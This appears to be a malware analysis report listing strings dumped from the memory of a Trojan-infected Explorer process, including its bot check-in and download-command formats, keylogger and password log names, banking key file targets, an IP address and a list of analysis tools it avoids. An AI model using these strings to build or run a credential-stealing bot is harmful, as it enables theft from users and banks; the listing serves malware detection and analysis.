The Trojan connects to the servers at the following location(s):
Strings from Dumps
Explorer.EXE_532_rwx_02250000_000B2000:
.text
`.data
.reloc
`.rdata
@.data
http
PASSu98V
PASSu08V
FTPQ
12345678
password1
monkey
monkey1
password
Pname.key
\secrets.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
ollydbg.exe
dumpcap.exe
wireshark.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
sysinfo.log
scr.jpg
minidump.bin
%d.%d.%d.%d
à %dh %dm
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
url%i
4.8.14
%dx%d@%d
%c%d:d
{Windows directory:
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Referer: hXXp://VVV.google.com
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
/search.php
Winmm.dll
Kernel32.dll
Gdi32.dll
ntdll.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
\firefox.exe
keygrab
u.jpg
IprivLibEx.dll
\\.\PhysicalDrive%u
/topic.php
keylog.txt
sniff.log
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
command=config&update_url=
&port=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\svchost.exe
\opera.exe
\cbmain.ex
\iscc.exe
\clmain.exe
\wclnt.exe
internal_wutex_0xx
%s.dbf
%s.DBF
pop2://%s:%s@%s:%i
pop3://%s:%s@%s:%i
nntp://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://anonymous:
AUTHINFO PASS
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
login=
password=
pass_
ssleay32.dll
advapi32.dll
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.jpg
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
cert.pem
cert.pem
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
winmm.dll
winmm.dll
1.2.5
1.2.5
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
%s\%s
%s\%s
#webcam
#webcam
#webcam%d
#webcam%d
RFB d.d
RFB d.d
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
WinExec
WinExec
SetThreadExecutionState
SetThreadExecutionState
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
GetKeyboardLayoutList
GetKeyboardLayoutList
GetAsyncKeyState
GetAsyncKeyState
GetKeyboardLayout
GetKeyboardLayout
MapVirtualKeyW
MapVirtualKeyW
VkKeyScanW
VkKeyScanW
VkKeyScanExW
VkKeyScanExW
keybd_event
keybd_event
EnumChildWindows
EnumChildWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
SetKeyboardState
SetKeyboardState
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
gdiplus.dll
gdiplus.dll
MSVCRT.dll
MSVCRT.dll
AVICAP32.dll
AVICAP32.dll
MSVFW32.dll
MSVFW32.dll
ShellExecuteW
ShellExecuteW
GetProcessHeap
GetProcessHeap
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
5`6C6Q6}6
5`6C6Q6}6
55
55
;";,;6;
;";,;6;
6&7-737
6&7-737
3"33393>3}3
3"33393>3}3
;#;);/;=;
;#;);/;=;
=}=
=}=
:(:-:8:=:
:(:-:8:=:
7#7)7/7=7
7#7)7/7=7
9&9,929@9
9&9,929@9
0!02090>0
0!02090>0
>$>*>4>9>
>$>*>4>9>
Windows Explorer
Windows Explorer
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
dntdll.dll
dntdll.dll
.NET CLR Networking_Perf_Library_Lock_PID_0
.NET CLR Networking_Perf_Library_Lock_PID_0
.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0
.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0
ASP.NET_2.0.50727_Perf_Library_Lock_PID_0
ASP.NET_2.0.50727_Perf_Library_Lock_PID_0
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
iexplore.exe
iexplore.exe
HighMemoryEvent_x
HighMemoryEvent_x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.MUTEX.x
MSCTF.Shared.MUTEX.x
.Prev
.Prev
.current
.current
Explorer.EXE_532_rwx_02AF0000_000B8000:
.text
`.rdata
@.data
.reloc
http
PASSu98V
PASSu08V
FTPQ
12345678
password1
monkey
monkey1
password
Pname.key
\secrets.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
ollydbg.exe
dumpcap.exe
wireshark.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
sysinfo.log
scr.jpg
minidump.bin
%d.%d.%d.%d
à %dh %dm
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
url%i
4.8.14
%dx%d@%d
%c%d:d
{Windows directory:
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Referer: hXXp://VVV.google.com
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
/search.php
Winmm.dll
Kernel32.dll
Gdi32.dll
ntdll.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
\firefox.exe
keygrab
u.jpg
IprivLibEx.dll
\\.\PhysicalDrive%u
/topic.php
keylog.txt
sniff.log
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
command=config&update_url=
&port=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\svchost.exe
\opera.exe
\cbmain.ex
\iscc.exe
\clmain.exe
\wclnt.exe
internal_wutex_0xx
%s.dbf
%s.DBF
pop2://%s:%s@%s:%i
pop3://%s:%s@%s:%i
nntp://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://anonymous:
AUTHINFO PASS
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
login=
password=
pass_
ssleay32.dll
advapi32.dll
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.jpg
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
cert.pem
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
winmm.dll
1.2.5
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
%s\%s
#webcam
#webcam%d
RFB d.d
%s (%s)
d/d/d d:d
password check failed!
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
dbghelp.dll
PSAPI.DLL
NETAPI32.dll
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
WinExec
SetThreadExecutionState
GetWindowsDirectoryA
KERNEL32.dll
GetKeyboardState
MsgWaitForMultipleObjects
GetKeyboardLayoutList
GetAsyncKeyState
GetKeyboardLayout
MapVirtualKeyW
VkKeyScanW
VkKeyScanExW
keybd_event
EnumChildWindows
ActivateKeyboardLayout
SetKeyboardState
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegNotifyChangeKeyValue
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
gdiplus.dll
MSVCRT.dll
AVICAP32.dll
MSVFW32.dll
ShellExecuteW
GetProcessHeap
SYSTEM!XP7!F9BE9A8A
%WinDir%\apppatch\dbvpfca.exe
%Documents and Settings%\%current user%\Application Data\
`.data
Windows Explorer
mavast.com
ya.ru
serverkey.dat
\windows\
dntdll.dll
.NET CLR Networking_Perf_Library_Lock_PID_0
.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0
ASP.NET_2.0.50727_Perf_Library_Lock_PID_0
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings
iexplore.exe
HighMemoryEvent_x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.MUTEX.x
.Prev
.current